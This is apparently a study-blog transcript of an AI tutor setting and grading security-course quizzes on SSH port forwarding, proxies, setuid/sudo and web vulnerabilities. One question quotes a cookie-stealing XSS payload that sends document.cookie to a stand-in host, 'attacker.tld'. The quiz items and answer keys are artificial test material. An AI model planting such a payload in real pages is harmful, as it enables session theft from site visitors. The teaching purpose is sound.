5618 Multiple-Choice Review 4
This post was last updated by 方少年 on 26 November 2025.
OK! Following your latest request, I will not reveal any answers or the answer distribution in the output. Below are 15 brand-new English multiple-choice questions (each with exactly one correct option); the difficulty and topics follow the sample exam you provided. Please write your answer letter (A/B/C/D) in the 【】 after each question; once you submit, I will grade them and give explanations.
1) In a file transfer, the recipient sees garbled characters due to a character encoding mismatch. At which OSI layer should troubleshooting begin?
a) Network
b) Transport
c) Data Link
d) Presentation
【D】

2) Which statement best defines the legal boundary for performing security testing on a target system?
a) It is acceptable if no data is damaged
b) It requires explicit authorization from the owner or authority
c) It is acceptable if intended for research
d) It is acceptable if commonly practiced in the industry
【B】

3) You have one public IP but must publish two different internal services by mapping different public ports to different internal hosts. Which solution should you use?
a) Port Address Translation (PAT)
b) DHCP relay
c) Static routing
d) DNS round-robin
【A】

4) Which statement correctly distinguishes a SOCKS proxy from a traditional web proxy?
a) SOCKS operates at a lower OSI layer than web proxies
b) SOCKS is limited to HTTP/HTTPS only
c) Web proxies primarily support arbitrary TCP protocols
d) Web proxies are optimized for HTTP(S), while SOCKS can proxy a wider range of protocols (e.g., FTP, SMTP)
【D】

5) You can SSH into a bastion host but an internal web app is not exposed externally. Which technique creates a direct tunnel from a local port to the app’s host:port without changing browser proxy settings?
a) SSH local port forwarding
b) SSH reverse port forwarding
c) VPN tunneling of all traffic
d) SSH dynamic port forwarding (SOCKS)
【D】

6) A comment feature reflects the following payload to other users’ browsers:
<script>document.location='https://attacker.tld/steal?c='+document.cookie</script>
Which vulnerability is being exploited?
a) SQL Injection
b) Cross-Site Request Forgery (CSRF)
c) Cross-Site Scripting (XSS)
d) Remote Code Execution
【C】

7) A team wants to find security flaws by analyzing source code before compilation or runtime. Which method fits best?
a) Dynamic Application Security Testing (DAST)
b) Static Application Security Testing (SAST)
c) Fuzz testing
d) Penetration testing
【B】

8) A tester submits large volumes of random or malformed inputs to trigger crashes and unexpected behavior. Which technique is being used?
a) Regression testing
b) Unit testing
c) Fuzz testing
d) Static analysis
【C】

9) Which statement about signature-based malware detection is most accurate?
a) It is primarily behavior-based and excels at unknown threats
b) It cannot detect any known malware reliably
c) It requires no frequent updates to remain effective
d) It detects known malware effectively but is weak against zero-day variants lacking signatures
【D】

10) Which tool is primarily used to quickly enumerate web directories and files by brute-forcing paths?
a) Hydra
b) Gobuster
c) Metasploit
d) Netcat
【B】

11) Which scenario best represents horizontal privilege escalation?
a) One regular user gains access to another regular user’s account or data
b) A standard user becomes an administrator on the same system
c) An administrator grants themselves additional system-wide permissions
d) A standard user modifies system files and becomes root
【A】

12) A root-owned binary, when executed by a normal user, runs with an effective UID of root and performs privileged actions. Which mechanism is most likely responsible?
a) Misconfigured cron job
b) Misconfigured sudoers file
c) Setuid bit
d) Setgid bit
【Don't know】

13) What is the primary purpose of AndroidManifest.xml in an Android application?
a) To define the app’s UI layouts and views
b) To provide essential metadata to the system and declare required permissions
c) To store the app’s images and graphical assets
d) To define the app’s internal database schema
【B】

14) What is the main purpose of a chain of custody protocol in digital forensics?
a) To ensure evidence is properly handled and documented to prevent tampering
b) To manage user access control policies for endpoints
c) To store and rotate encryption keys for sensitive data
d) To automate malware triage during incident response
【A】

15) You need a flexible way to access multiple internal services through a single SSH connection by configuring your browser to use a local SOCKS proxy. Which technique should you use?
a) SSH local port forwarding
b) SSH reverse port forwarding
c) VPN split tunneling
d) SSH dynamic port forwarding
【D】
Grading result: 13 / 15
Per-question verdicts and explanations (without revealing option letters):
1) Correct
Key point: data-representation issues such as character encoding, encryption/decryption and compression belong to the Presentation layer.

2) Correct
Key point: the legal boundary for security testing is explicit authorization; intent or industry custom does not confer legality.

3) Correct
Key point: mapping ports on a single public IP to different internal hosts/services uses the port address translation / port forwarding approach.

4) Correct
Key point: web proxies are mainly aimed at HTTP(S) scenarios; SOCKS is a general-purpose proxy that can forward more protocols (e.g. FTP, SMTP).

5) Incorrect
Key point: the question stresses "a direct connection to the target host:port with no change to browser proxy settings", which calls for local port forwarding. Dynamic forwarding (SOCKS) requires pointing the browser/application at the local SOCKS proxy.
To tell them apart:
- Local forwarding: maps a port on your machine to an internal target host:port; suited to direct access to a single service.
- Dynamic forwarding: starts a SOCKS proxy on your machine; after configuring the browser/tool to use that proxy, you can reach many targets/ports.
- Reverse forwarding: lets the remote end connect back to a port on your local machine; commonly used to reach a local service from outside.

6) Correct
Key point: injecting a script that executes in other users' browsers and steals cookies is the classic behaviour of reflected/stored cross-site scripting (XSS).

7) Correct
Key point: finding defects in source code before compilation/runtime via static rules and data/control-flow analysis is static application security testing.

8) Correct
Key point: feeding a target large volumes of random/malformed input to trigger crashes or anomalies is fuzz testing.

9) Correct
Key point: signature-based methods work well against known malicious samples but poorly against zero-day samples/variants without signatures, and require frequent updates.

10) Correct
Key point: directory/file enumeration commonly uses a path brute-forcing tool to discover hidden resources.

11) Correct
Key point: horizontal privilege escalation is unauthorized access between accounts of the same level (user A accesses user B's data), as opposed to vertical escalation (ordinary user → administrator/root).

12) Not answered (counted as incorrect)
Key point: the question describes "when an ordinary user executes a root-owned binary, the process's effective UID becomes root and gains privileges", which is the classic setuid mechanism.
Further distinctions:
- sudoers: only takes effect when invoked through sudo; the question does not use sudo.
- setgid: changes the effective group identity; it does not grant the root user identity.
- cron: scheduled tasks; not the same as elevation on execution.

13) Correct
Key point: AndroidManifest.xml declares the app's components, permissions and metadata so the system can recognize and schedule them.

14) Correct
Key point: the chain of custody ensures the whole collection-transfer-storage-analysis process is auditable and tamper-resistant.

15) Correct
Key point: starting a local SOCKS proxy over a single SSH connection and pointing the browser at it to reach multiple internal services is the dynamic forwarding scenario.
Quick reinforcement for the wrong answers:
Port forwarding family:
- Local forwarding = direct connection to a single target service; no proxy settings change needed.
- Dynamic forwarding = creates a SOCKS proxy, suited to many targets/ports, but the client must be configured to use the proxy.
- Reverse forwarding = lets the remote host connect back to your local port.
- setuid escalation principle: if a binary has the setuid bit and is owned by root, the process's effective UID is set to root; this is a common escalation point, so use it minimally, prefer Linux capabilities instead, and sanitize environment variables/PATH.
If you like, I can write 2 variant practice questions each on "local/dynamic/reverse forwarding" and "setuid vs sudoers/setgid" to keep testing and deepen retention.
OK! Per your review goals, here are variant practice questions for each of the two topics. Following your earlier requirements: each question has exactly one correct answer; the questions are in English; no answers are provided this round, and I will grade and explain after you answer; each question ends with 【】 for you to fill in.
Topic 1: SSH local/dynamic/reverse forwarding variant practice (6 questions)
1) You need one-off access from your laptop to an internal database at 10.0.2.15:5432 via a bastion (bastion.example.com). You don’t want to change any client proxy settings. Which SSH technique best fits?
a) Local port forwarding
b) Dynamic port forwarding
c) Reverse port forwarding
d) VPN full tunneling
【A】

2) You want your remote teammate (on a server you SSH into) to reach a web tool running on your laptop at http://127.0.0.1:8080. Which technique exposes your local service to the remote host through the SSH connection?
a) Local port forwarding
b) Dynamic port forwarding (SOCKS)
c) Reverse port forwarding
d) SSH jump proxy
【C】

3) Your browser must access many internal systems (HTTP, SSH over proxy-aware client, custom TCP) through a single SSH connection to a bastion, and you are fine configuring the browser to use a local proxy. Which approach is most appropriate?
a) Local port forwarding to each target
b) Dynamic port forwarding to create a local SOCKS proxy
c) Reverse port forwarding back to the bastion
d) Static routing entries on your laptop
【B】

4) A CI runner inside a private VPC must pull artifacts from your machine during build. You can SSH into the runner, but inbound to your laptop is blocked by NAT/firewall. Which method lets the runner connect back to a port on your laptop through the SSH tunnel you initiated?
a) Local port forwarding
b) Reverse port forwarding
c) Dynamic port forwarding
d) Split-tunnel VPN
【B】

5) You created an SSH tunnel using dynamic port forwarding on port 1080 locally. Your browser cannot reach internal sites until you modify its network settings. Why?
a) Dynamic forwarding requires the browser to be configured to use the local SOCKS proxy
b) The tunnel only supports UDP
c) The tunnel changes system routing tables automatically
d) SSH always sets up HTTP CONNECT proxies, not SOCKS
【B】

6) Which statement best differentiates local vs reverse port forwarding?
a) Local forwarding maps a local port to a remote target; reverse forwarding maps a remote port to a local target
b) Local forwarding always requires proxy settings; reverse forwarding never does
c) Local forwarding only supports UDP; reverse forwarding only supports TCP
d) Local forwarding is less secure than reverse forwarding
【A】
Topic 2: setuid vs sudoers vs setgid variant practice (6 questions)
7) A normal user executes /usr/local/bin/backup owned by root. The process can read /etc/shadow even though the user cannot. No sudo was used. Which mechanism most likely enables this?
a) Misconfigured cron job
b) setuid on the binary
c) sudoers NOPASSWD entry
d) setgid on the binary
【B】

8) Which statement accurately compares setuid and sudo?
a) setuid changes the real UID; sudo changes only the group
b) setuid can elevate effective UID when executing the binary; sudo consults policy to run a command as another user
c) setuid requires a password prompt; sudo never requires a password
d) setuid only works on scripts; sudo only works on binaries
【AB, not sure】

9) A binary is group-owned by “dbadmin” with the setgid bit set. What is the typical effect when a regular user runs it?
a) The process’s effective UID becomes root
b) The process’s effective GID becomes dbadmin
c) The process’s real GID becomes 0
d) The user gains sudo privileges
【B】

10) Which is a safer modern alternative to avoid granting full root via setuid for networking utilities (e.g., ping)?
a) Running everything with sudo
b) Using Linux capabilities to grant only needed privileges
c) Setting setgid on all binaries
d) Mounting all filesystems with nosuid
【B】

11) Why is relying on setuid root binaries risky from a security standpoint?
a) They can only be executed by root
b) They ignore environment variables entirely
c) Any memory-safety or environment-handling bug can lead to privilege escalation
d) They cannot open files
【A】

12) Which control in sudoers reduces attack surface compared to blanket sudo?
a) Allowing ALL commands for ALL users
b) Requiring NOPASSWD for convenience
c) Command whitelisting with least privilege and logging
d) Disabling TTY requirement
【C】
Grading result: 9 / 12
Verdicts and explanations (without revealing the standard option letters; conclusions and key points only):
Topic 1: SSH local/dynamic/reverse forwarding (Q1–Q6)
1) Correct
Key point: no proxy settings change and a direct connection to a single internal target service = local port forwarding fits best. Example:
ssh -L 15432:10.0.2.15:5432 user@bastion.example.com
# connecting locally to 127.0.0.1:15432 is equivalent to connecting directly to 10.0.2.15:5432

2) Correct
Key point: for the remote host to reach your local 127.0.0.1:8080, you need "a remote port mapped to local" = reverse port forwarding. Example:
ssh -R 9000:127.0.0.1:8080 user@remote
# the remote side connects to 127.0.0.1:9000 -> your local 127.0.0.1:8080

3) Correct
Key point: accessing many internal systems from the browser, with willingness to configure a browser proxy = dynamic port forwarding (local SOCKS proxy). Example:
ssh -D 1080 user@bastion
# configure the browser to use SOCKS5 proxy 127.0.0.1:1080

4) Correct
Key point: you can actively SSH into the CI runner, but it cannot initiate a connection back to your laptop; this "let the remote end connect back to local" scenario = reverse port forwarding.

5) Incorrect
Key point: dynamic forwarding starts a local SOCKS proxy; a browser will not automatically go through SOCKS unless its proxy settings are changed, so the network proxy must be configured manually. It is not a matter of "only supports UDP". Notes:
- Dynamic forwarding is used for TCP by default; the SOCKS5 protocol supports UDP Associate, but browsing web pages is mainly TCP.
- Correct approach: set SOCKS5 127.0.0.1:1080 in the browser, or use a system proxy / Proxy Auto-Config.
ssh -D 1080 user@bastion
# then select SOCKS5 proxy 127.0.0.1:1080 in the browser's network settings

6) Correct
Key point: local forwarding = "local port -> remote target"; reverse forwarding = "remote port -> local target".
Topic 2: setuid vs sudoers vs setgid (Q7–Q12)
7) Correct
Key point: being able to read /etc/shadow without using sudo is typical of a binary with setuid (owned by root); the process's effective UID switches to root.

8) Non-conforming answer (multiple selections), counted as incorrect
Key point: the single correct statement must capture both of these points:
- setuid: when the binary is executed, the process's effective UID can be raised to the file owner (commonly root).
- sudo: according to sudoers policy, runs a command as another user (may require a password; auditable/logged).
Why the other distractors are wrong:
- Claims such as "changes the real UID / only changes the group" are inaccurate or swap concepts;
- "setuid requires a password / only works on scripts" are both wrong (most kernels ignore setuid on scripts by default, and setuid execution does not prompt for a password).

9) Correct
Key point: setgid is about group identity; at runtime the process's effective GID becomes the binary's group (e.g. dbadmin), enabling access to resources protected by group permissions.

10) Correct
Key point: Linux capabilities grant fine-grained privileges (e.g. only cap_net_raw for ping), replacing coarse "whole-machine root" setuid; safer and more controllable. Example:
sudo setcap cap_net_raw+ep /bin/ping
getcap /bin/ping

11) Incorrect
Key point: the risk of setuid root programs is that "any memory-safety or environment-handling defect can potentially be exploited for privilege escalation". It is not that "only root can execute them" (it is precisely because ordinary users can execute them that the risk exists). Additional notes:
- Risk surface: buffer overflows, mishandled environment variables such as PATH/HOME/LD_PRELOAD, insecure temporary files, etc.
- Mitigations: minimize setuid, prefer capabilities, privilege separation / drop privileges promptly after execution, mount with nosuid, strictly sanitize environment variables.

12) Correct
Key point: applying "least privilege + command whitelisting + audit logging" in sudoers effectively shrinks the attack surface; conversely, granting ALL or NOPASSWD indiscriminately amplifies risk.
Quick summary
Local/dynamic/reverse:
- Local: I connect to a single internal target; the client does not need to change proxy settings.
- Dynamic: I open a SOCKS proxy locally; the client must configure a proxy and can then reach many targets.
- Reverse: lets the remote end connect back to my local port through the tunnel I established.
setuid/sudo/setgid:
- setuid: on execution, raises the effective UID to the file owner, usually root.
- sudo: runs commands as another identity according to policy; can be logged and can require a password.
- setgid: changes the effective GID for group-permission access; it is not user-identity escalation.
Would you like me to write a few more "same-pitfall" reinforcement questions for questions 5, 8 and 11 in different scenarios so you can review right away?
Article link: https://www.fangshaonian.cn/archives/147/
Last edited: 26 November 2025 02:58 by 方少年
License: Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)